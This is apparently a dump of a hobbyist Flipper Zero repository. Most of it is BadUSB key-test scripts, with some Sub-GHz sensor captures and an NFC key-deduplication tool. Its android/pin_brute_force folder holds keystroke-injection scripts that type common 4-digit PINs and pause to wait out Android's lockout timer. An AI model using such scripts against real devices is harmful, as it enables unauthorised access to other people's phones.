├── firmware └── rogueMaster │ ├── readme.md │ └── flipper-z-f7-update-0.73.2-1213-RM2228.tar.gz ├── .github └── FUNDING.yml ├── gpio ├── bme680 │ ├── branchement_bme680.png │ └── branchement_bme680.xcf ├── gps │ ├── branchement_gps_NEO6MV2.jpg │ └── branchement_gps_NEO6MV2.xcf ├── infrared │ ├── branchement_infrared.png │ └── branchement_infrared.xcf └── ethernet │ ├── branchement_ethernet_w5500.jpg │ └── branchement_ethernet_w5500.xcf ├── badusb ├── kanjian_test_keys_bad_usb │ ├── no_delay_one.txt │ ├── alt.txt │ ├── app.txt │ ├── ctrl.txt │ ├── end.txt │ ├── f1.txt │ ├── f10.txt │ ├── f11.txt │ ├── f12.txt │ ├── f2.txt │ ├── f3.txt │ ├── f4.txt │ ├── f5.txt │ ├── f6.txt │ ├── f7.txt │ ├── f8.txt │ ├── f9.txt │ ├── gui.txt │ ├── home.txt │ ├── menu.txt │ ├── tab.txt │ ├── break.txt │ ├── delete.txt │ ├── enter.txt │ ├── escape.txt │ ├── insert.txt │ ├── left.txt │ ├── pageup.txt │ ├── pause.txt │ ├── shift.txt │ ├── space.txt │ ├── up.txt │ ├── backspace.txt │ ├── capslock.txt │ ├── command.txt │ ├── control.txt │ ├── down.txt │ ├── pagedown.txt │ ├── right.txt │ ├── windows.txt │ ├── printscreen.txt │ ├── multi.txt │ ├── numbers.txt │ ├── stringln.txt │ ├── no_delay_multi.txt │ ├── kanjian-arrow-test.txt │ └── kanjian-test-keys.txt ├── kanjian_yt_channel.txt ├── kanjian_yt_channel_string.txt └── android │ └── pin_brute_force │ ├── 1000_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 1500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 2000_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 2500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 3000_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 3500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 4500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 5000_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 5500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 1000_delay_4_digit_pin_bf_test.txt │ ├── 1500_delay_4_digit_pin_bf_test.txt │ ├── 2000_delay_4_digit_pin_bf_test.txt │ ├── 2500_delay_4_digit_pin_bf_test.txt │ ├── 3000_delay_4_digit_pin_bf_test.txt │ ├── 3500_delay_4_digit_pin_bf_test.txt │ ├── 4500_delay_4_digit_pin_bf_test.txt │ ├── 5000_delay_4_digit_pin_bf_test.txt │ ├── 5500_delay_4_digit_pin_bf_test.txt │ ├── 6000_delay_4_digit_pin_bf_test .txt │ ├── 6500_delay_4_digit_pin_bf_test.txt │ ├── 6000_delay_4_digit_pin_bf_test_no_enter.txt │ ├── 6500_delay_4_digit_pin_bf_test_no_enter.txt │ ├── tab_1000_delay_4_digit_pin_bf_test.txt │ └── top65_4digit_pin_bf.txt ├── subghz └── nexus-th │ ├── Vi_r.sub │ ├── readable.sub │ ├── data_finder.py │ ├── Vi_u.sub │ ├── temp.txt │ ├── SubGHz_2024-12-04_13,22,38.sub │ └── SubGHz_2024-11-26_13,20,14.sub ├── nfc └── tools │ ├── README.md │ └── flipper_zero_nfc_keys_splitting.py ├── scripts ├── 01_poc_js_kanjian_WIN_layout.js └── 01_poc_js_kanjian_WIN.js ├── wifi ├── README.md └── evil_portal │ └── orange.html ├── README.md ├── pcb └── bw16 │ └── devkit │ ├── bw16_dev_kit_symbole.kicad_sym │ └── BW16 dev kit_empreinte.kicad_mod └── LICENSE /firmware/rogueMaster/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: [inaz0] 2 | custom: ["https://www.buymeacoffee.com/inazo"] 3 | -------------------------------------------------------------------------------- /gpio/bme680/branchement_bme680.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/bme680/branchement_bme680.png -------------------------------------------------------------------------------- /gpio/bme680/branchement_bme680.xcf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/bme680/branchement_bme680.xcf -------------------------------------------------------------------------------- /gpio/gps/branchement_gps_NEO6MV2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/gps/branchement_gps_NEO6MV2.jpg -------------------------------------------------------------------------------- /gpio/gps/branchement_gps_NEO6MV2.xcf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/gps/branchement_gps_NEO6MV2.xcf -------------------------------------------------------------------------------- /gpio/infrared/branchement_infrared.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/infrared/branchement_infrared.png -------------------------------------------------------------------------------- /gpio/infrared/branchement_infrared.xcf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/infrared/branchement_infrared.xcf -------------------------------------------------------------------------------- /gpio/ethernet/branchement_ethernet_w5500.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/ethernet/branchement_ethernet_w5500.jpg -------------------------------------------------------------------------------- /gpio/ethernet/branchement_ethernet_w5500.xcf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/gpio/ethernet/branchement_ethernet_w5500.xcf -------------------------------------------------------------------------------- /firmware/rogueMaster/flipper-z-f7-update-0.73.2-1213-RM2228.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/inaz0/flipperZero/HEAD/firmware/rogueMaster/flipper-z-f7-update-0.73.2-1213-RM2228.tar.gz -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/no_delay_one.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | STRING ABCDEF 5 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/alt.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | ALT 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/app.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | APP 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/ctrl.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | CTRL 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/end.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | END 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f1.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F1 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f10.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F10 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f11.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F11 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f12.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F12 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f2.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F2 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f3.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F3 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f4.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F4 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f5.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F5 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f6.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F6 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f7.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F7 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f8.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F8 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/f9.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | F9 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/gui.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | GUI 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/home.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | HOME 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/menu.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | MENU 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/tab.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | TAB 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/break.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | BREAK 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/delete.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | DELETE 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | ENTER 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/escape.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | ESCAPE 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/insert.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | INSERT 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/left.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | UPARROW 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/pageup.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | PAGEUP 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/pause.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | PAUSE 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/shift.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | SHIFT 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/space.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | SPACE 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/up.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | LEFTARROW 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/backspace.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | BACKSPACE 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/capslock.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | CAPSLOCK 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/command.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | COMMAND 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/control.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | CONTROL 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/down.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | 5 | DELAY 3000 6 | DOWNARROW 7 | DELAY 3000 8 | 9 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/pagedown.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | PAGEDOWN 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/right.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | LEFTARROW 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/windows.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | WINDOWS 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/printscreen.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | PRINTSCREEN 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/multi.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | STRING 1234567890abcdef 6 | DELAY 3000 7 | 8 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/numbers.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | 5 | DELAY 3000 6 | STRING 0123456789 7 | DELAY 3000 8 | 9 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/stringln.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | STRINGLN a 6 | STRINGLN b 7 | DELAY 3000 8 | 9 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/no_delay_multi.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | STRING A 5 | STRING B 6 | STRING C 7 | STRING D 8 | STRING E 9 | 10 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/kanjian-arrow-test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | SPACE 6 | DELAY 3000 7 | ESCAPE 8 | DELAY 3000 9 | ENTER 10 | -------------------------------------------------------------------------------- /badusb/kanjian_yt_channel.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | GUI r 5 | DELAY 2000 6 | ENTER 7 | DELAY 1000 8 | CTRL l 9 | DELAY 1000 10 | ALTSTRING https://www.youtube.com/@kanjian_fr 11 | DELAY 100 12 | ENTER 13 | DELAY 500 14 | -------------------------------------------------------------------------------- /badusb/kanjian_yt_channel_string.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | GUI r 5 | DELAY 2000 6 | ENTER 7 | DELAY 1000 8 | CTRL l 9 | DELAY 1000 10 | STRING https://www.youtube.com/@kanjian_fr 11 | DELAY 100 12 | ENTER 13 | DELAY 500 14 | -------------------------------------------------------------------------------- /subghz/nexus-th/Vi_r.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Lat: 0.000000 6 | Lon: 0.000000 7 | Protocol: Nexus-TH 8 | Id: 73 9 | Bit: 36 10 | Data: 00 00 00 04 98 0C AF 29 11 | Batt: 0 12 | Hum: 41 13 | Ts: 1733323605 14 | Ch: 1 15 | Btn: 255 16 | Temp: 20.200001 17 | -------------------------------------------------------------------------------- /subghz/nexus-th/readable.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Lat: 0.000000 6 | Lon: 0.000000 7 | Protocol: Nexus-TH 8 | Id: 73 9 | Bit: 36 10 | Data: 00 00 00 04 98 0C 9F 2E 11 | Batt: 0 12 | Hum: 46 13 | Ts: 1733318496 14 | Ch: 1 15 | Btn: 255 16 | Temp: 20.100000 17 | -------------------------------------------------------------------------------- /nfc/tools/README.md: -------------------------------------------------------------------------------- 1 | # Splitting keys in dict 2 | 3 | EN : 4 | 5 | A very simple tool for split the duplicate keys in the user dict of flipper zero for NFC application. 6 | 7 | FR : 8 | 9 | Un outil très simple pour dédoublonner les clés du dictionnaire utilisateur du flipper zero pour l'application NFC. 10 | 11 | # Usage 12 | 13 | Example : 14 | 15 | ```python 16 | python3 flipper_zero_nfc_keys_splitting.py --in /home/inazo/mf_classic_dict_user_2024-04-22.nfc --out mf_classic_dict_user.nfc 17 | ``` 18 | 19 | Output result: 20 | 21 | ```bash 22 | Number of keys before splitting: 9008 23 | Number of keys after splitting: 3827 24 | ``` -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/1000_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 1000 5 | STRING 4321 6 | DELAY 1000 7 | 8 | DELAY 1000 9 | STRING 1111 10 | DELAY 1000 11 | 12 | DELAY 1000 13 | STRING 2222 14 | DELAY 1000 15 | 16 | DELAY 1000 17 | STRING 3333 18 | DELAY 1000 19 | 20 | DELAY 1000 21 | STRING 1234 22 | DELAY 1000 23 | 24 | DELAY 31000 25 | 26 | DELAY 1000 27 | STRING 4444 28 | DELAY 1000 29 | 30 | DELAY 1000 31 | STRING 5555 32 | DELAY 1000 33 | 34 | DELAY 1000 35 | STRING 6666 36 | DELAY 1000 37 | 38 | DELAY 1000 39 | STRING 7777 40 | DELAY 1000 41 | 42 | DELAY 1000 43 | STRING 8888 44 | DELAY 1000 45 | 46 | DELAY 1000 47 | STRING x 48 | DELAY 1000 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/1500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 1500 5 | STRING 4321 6 | DELAY 1500 7 | 8 | DELAY 1500 9 | STRING 1111 10 | DELAY 1500 11 | 12 | DELAY 1500 13 | STRING 2222 14 | DELAY 1500 15 | 16 | DELAY 1500 17 | STRING 3333 18 | DELAY 1500 19 | 20 | DELAY 1500 21 | STRING 1234 22 | DELAY 1500 23 | 24 | DELAY 31000 25 | 26 | DELAY 1500 27 | STRING 4444 28 | DELAY 1500 29 | 30 | DELAY 1500 31 | STRING 5555 32 | DELAY 1500 33 | 34 | DELAY 1500 35 | STRING 6666 36 | DELAY 1500 37 | 38 | DELAY 1500 39 | STRING 7777 40 | DELAY 1500 41 | 42 | DELAY 1500 43 | STRING 8888 44 | DELAY 1500 45 | 46 | DELAY 1500 47 | STRING x 48 | DELAY 1500 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/2000_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 2000 5 | STRING 4321 6 | DELAY 2000 7 | 8 | DELAY 2000 9 | STRING 1111 10 | DELAY 2000 11 | 12 | DELAY 2000 13 | STRING 2222 14 | DELAY 2000 15 | 16 | DELAY 2000 17 | STRING 3333 18 | DELAY 2000 19 | 20 | DELAY 2000 21 | STRING 1234 22 | DELAY 2000 23 | 24 | DELAY 31000 25 | 26 | DELAY 2000 27 | STRING 4444 28 | DELAY 2000 29 | 30 | DELAY 2000 31 | STRING 5555 32 | DELAY 2000 33 | 34 | DELAY 2000 35 | STRING 6666 36 | DELAY 2000 37 | 38 | DELAY 2000 39 | STRING 7777 40 | DELAY 2000 41 | 42 | DELAY 2000 43 | STRING 8888 44 | DELAY 2000 45 | 46 | DELAY 2000 47 | STRING x 48 | DELAY 2000 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/2500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 2500 5 | STRING 4321 6 | DELAY 2500 7 | 8 | DELAY 2500 9 | STRING 1111 10 | DELAY 2500 11 | 12 | DELAY 2500 13 | STRING 2222 14 | DELAY 2500 15 | 16 | DELAY 2500 17 | STRING 3333 18 | DELAY 2500 19 | 20 | DELAY 2500 21 | STRING 1234 22 | DELAY 2500 23 | 24 | DELAY 31000 25 | 26 | DELAY 2500 27 | STRING 4444 28 | DELAY 2500 29 | 30 | DELAY 2500 31 | STRING 5555 32 | DELAY 2500 33 | 34 | DELAY 2500 35 | STRING 6666 36 | DELAY 2500 37 | 38 | DELAY 2500 39 | STRING 7777 40 | DELAY 2500 41 | 42 | DELAY 2500 43 | STRING 8888 44 | DELAY 2500 45 | 46 | DELAY 2500 47 | STRING x 48 | DELAY 2500 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/3000_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 3000 5 | STRING 4321 6 | DELAY 3000 7 | 8 | DELAY 3000 9 | STRING 1111 10 | DELAY 3000 11 | 12 | DELAY 3000 13 | STRING 2222 14 | DELAY 3000 15 | 16 | DELAY 3000 17 | STRING 3333 18 | DELAY 3000 19 | 20 | DELAY 3000 21 | STRING 1234 22 | DELAY 3000 23 | 24 | DELAY 31000 25 | 26 | DELAY 3000 27 | STRING 4444 28 | DELAY 3000 29 | 30 | DELAY 3000 31 | STRING 5555 32 | DELAY 3000 33 | 34 | DELAY 3000 35 | STRING 6666 36 | DELAY 3000 37 | 38 | DELAY 3000 39 | STRING 7777 40 | DELAY 3000 41 | 42 | DELAY 3000 43 | STRING 8888 44 | DELAY 3000 45 | 46 | DELAY 3000 47 | STRING x 48 | DELAY 3000 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/3500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 3500 5 | STRING 4321 6 | DELAY 3500 7 | 8 | DELAY 3500 9 | STRING 1111 10 | DELAY 3500 11 | 12 | DELAY 3500 13 | STRING 2222 14 | DELAY 3500 15 | 16 | DELAY 3500 17 | STRING 3333 18 | DELAY 3500 19 | 20 | DELAY 3500 21 | STRING 1234 22 | DELAY 3500 23 | 24 | DELAY 31000 25 | 26 | DELAY 3500 27 | STRING 4444 28 | DELAY 3500 29 | 30 | DELAY 3500 31 | STRING 5555 32 | DELAY 3500 33 | 34 | DELAY 3500 35 | STRING 6666 36 | DELAY 3500 37 | 38 | DELAY 3500 39 | STRING 7777 40 | DELAY 3500 41 | 42 | DELAY 3500 43 | STRING 8888 44 | DELAY 3500 45 | 46 | DELAY 3500 47 | STRING x 48 | DELAY 3500 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/4500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 4500 5 | STRING 4321 6 | DELAY 4500 7 | 8 | DELAY 4500 9 | STRING 1111 10 | DELAY 4500 11 | 12 | DELAY 4500 13 | STRING 2222 14 | DELAY 4500 15 | 16 | DELAY 4500 17 | STRING 3333 18 | DELAY 4500 19 | 20 | DELAY 4500 21 | STRING 1234 22 | DELAY 4500 23 | 24 | 